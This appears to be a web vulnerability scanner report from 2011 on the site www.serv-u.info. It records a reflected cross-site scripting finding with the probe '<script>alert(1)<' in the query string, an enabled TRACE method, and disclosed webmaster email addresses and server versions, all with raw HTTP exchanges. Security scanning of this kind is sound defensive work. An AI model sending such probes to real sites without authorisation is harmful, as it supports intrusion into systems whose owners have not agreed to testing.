1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.serv-u.info |
Path: | / |
GET /?3f867<script>alert(1)< Host: www.serv-u.info Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 19 Mar 2011 18:22:16 GMT Server: Apache/1.3.33 (Debian GNU/Linux) PHP/4.3.10-22 AuthMySQL/4.3.9-2 X-Powered-By: PHP/4.3.10-22 Content-Type: text/html; charset=ISO-8859-1 Content-Length: 23223 3f867<script>alert(1)< <html><!-- InstanceBegin template="/Templates ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.serv-u.info |
Path: | / |
TRACE / HTTP/1.0 Host: www.serv-u.info Cookie: 3d948b0876a83799 |
HTTP/1.1 200 OK Date: Sat, 19 Mar 2011 18:22:07 GMT Server: Apache/1.3.33 (Debian GNU/Linux) PHP/4.3.10-22 AuthMySQL/4.3.9-2 Connection: close Content-Type: message/http TRACE / HTTP/1.0 Cookie: 3d948b0876a83799 Host: www.serv-u.info |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.serv-u.info |
Path: | / |
GET / HTTP/1.1 Host: www.serv-u.info Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 19 Mar 2011 18:22:06 GMT Server: Apache/1.3.33 (Debian GNU/Linux) PHP/4.3.10-22 AuthMySQL/4.3.9-2 X-Powered-By: PHP/4.3.10-22 Content-Type: text/html; charset=ISO-8859-1 Content-Length: 23180 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><!-- InstanceBegin template="/Templates <head> <!-- InstanceBeginEditable name= ...[SNIP]... <meta name="Author" content="webmasteroftheday@kapper ...[SNIP]... <meta name="reply-to" content="webmaster@serv-u.info"> ...[SNIP]... <a href="mailto:webmaster@serv-u.info" class="link-footer">webmaster@serv-u.info</a> ...[SNIP]... |